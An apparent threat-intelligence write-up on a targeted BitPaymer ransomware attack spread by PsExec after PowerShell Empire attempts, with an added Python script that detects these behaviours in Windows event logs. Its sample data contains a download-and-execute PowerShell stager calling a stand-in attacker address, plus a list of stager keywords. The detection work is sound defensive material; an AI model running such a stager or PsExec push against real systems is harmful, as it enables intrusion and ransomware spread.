Attackers are taking a more targeted approach when choosing ransomware victims. This BitPaymer variant (Ransom.Win32.BITPAYMER.TGACAJ) has been seen a few times recently and is unusual in that its ransom note names the targeted company. That is what happened to an unnamed US manufacturing company: on 18 February the attackers used PsExec to push commands to the company's systems and install the ransomware. Leading up to that, from 29 January onward, the attackers had repeatedly attempted to run the PowerShell Empire backdoor. Because pushing BitPaymer through PsExec requires administrator credentials, the initial breach most likely occurred on or before 29 January.
An intrusion detection system, or endpoint telemetry reviewed for signs of PsExec-driven remote execution and PowerShell Empire activity, would have exposed this intrusion nearly three weeks before the ransomware ran. Accounts believed to be compromised should have their credentials reset immediately, and machines believed to be compromised should be isolated and cleaned as soon as possible to stop ransomware or other malware from spreading.
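Detection logic for the two behaviours described above, as an added example that is not code from the original article: it scans exported Windows event records for the PsExec service install (PSEXESVC), for processes spawned by that service, and for PowerShell launched with an encoded command that decodes to a download-and-execute stager of the kind Empire's launcher uses. The event field names, the sample records, the file paths and the stager URL are constructed for illustration and are assumptions, not data from the incident.

```python
"""Hunt for PsExec remote execution and Empire-style PowerShell launchers.

Added example, not code from the original article. Event records are
assumed to be Windows System-log and Sysmon entries exported as dicts
(field names follow a common JSON export layout; adjust to your pipeline).
"""
import base64
import binascii
import re

# PowerShell accepts any unambiguous prefix of -EncodedCommand (-e, -ec, -enc, ...).
PS_ENCODED_ARG = re.compile(r"(?i)(?:^|\s)-(?:e|ec|en|enc|encod\w*)\s+([A-Za-z0-9+/=]+)")
# Strings common to download-and-execute stagers such as Empire's launcher.
STAGER_INDICATORS = ("iex", "invoke-expression", "downloadstring", "net.webclient", "frombase64string")


def _encode_ps(script):
    """Encode a script the way -EncodedCommand expects it (base64 of UTF-16LE)."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def _basename(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def decode_encoded_command(cmdline):
    """Return the decoded -EncodedCommand payload, or None if absent or malformed."""
    m = PS_ENCODED_ARG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (binascii.Error, UnicodeDecodeError, ValueError):
        return None


def _finding(rule, ev, detail):
    return {"rule": rule, "host": ev.get("Computer"), "time": ev.get("TimeCreated"), "detail": detail}


def check_event(ev):
    """Apply the three rules to one event; return a finding dict or None."""
    eid = ev.get("EventID")
    if eid == 7045:  # System log: a new service was installed
        if ev.get("ServiceName", "").upper() == "PSEXESVC" or _basename(ev.get("ImagePath", "")) == "psexesvc.exe":
            return _finding("psexec_service_install", ev, ev.get("ImagePath", ""))
    elif eid == 1:  # Sysmon: process creation
        image = _basename(ev.get("Image", ""))
        cmdline = ev.get("CommandLine", "")
        if _basename(ev.get("ParentImage", "")) == "psexesvc.exe":
            return _finding("psexec_child_process", ev, cmdline)
        if image in ("powershell.exe", "pwsh.exe"):
            decoded = decode_encoded_command(cmdline)
            if decoded and any(ind in decoded.lower() for ind in STAGER_INDICATORS):
                return _finding("powershell_stager", ev, decoded)
    return None


def detect(events):
    """Run check_event over an iterable of events and return all findings in order."""
    return [f for f in (check_event(e) for e in events) if f]


# Constructed sample telemetry for one host (not data from the incident).
# 203.0.113.10 is a documentation address standing in for an attacker server.
_STAGER = "IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.10:8080/index.asp')"
SAMPLE_EVENTS = [
    {"TimeCreated": "2019-01-29T08:02:11Z", "Computer": "WS01", "EventID": 7045,
     "ServiceName": "Backup Agent", "ImagePath": r"C:\Program Files\Backup\agent.exe"},
    {"TimeCreated": "2019-01-29T09:40:31Z", "Computer": "WS01", "EventID": 1,
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r"powershell.exe -File C:\scripts\inventory.ps1"},
    {"TimeCreated": "2019-01-29T09:41:02Z", "Computer": "WS01", "EventID": 1,
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "powershell -enc " + _encode_ps("Get-Date")},  # encoded but benign
    {"TimeCreated": "2019-01-29T09:41:27Z", "Computer": "WS01", "EventID": 1,
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "powershell -noP -sta -w 1 -enc " + _encode_ps(_STAGER)},
    {"TimeCreated": "2019-02-18T03:14:02Z", "Computer": "WS01", "EventID": 7045,
     "ServiceName": "PSEXESVC", "ImagePath": r"%SystemRoot%\PSEXESVC.exe"},
    {"TimeCreated": "2019-02-18T03:14:05Z", "Computer": "WS01", "EventID": 1,
     "Image": r"C:\Windows\System32\cmd.exe",
     "ParentImage": r"C:\Windows\PSEXESVC.exe",
     "CommandLine": r"cmd.exe /c C:\Windows\Temp\update.exe"},
]

if __name__ == "__main__":
    for f in detect(SAMPLE_EVENTS):
        print(f["time"], f["host"], f["rule"], f["detail"][:60])
```

The encoded-command rule only fires when the decoded payload contains stager strings, so the benign `-enc` invocation of `Get-Date` is ignored; many teams also alert on any encoded PowerShell whose parent is not an administration tool, which would have flagged the Empire attempts on 29 January regardless of payload. Note that PsExec lets an operator rename the service with `-r`, so the service-install rule should be paired with the parent-process rule rather than relied on alone.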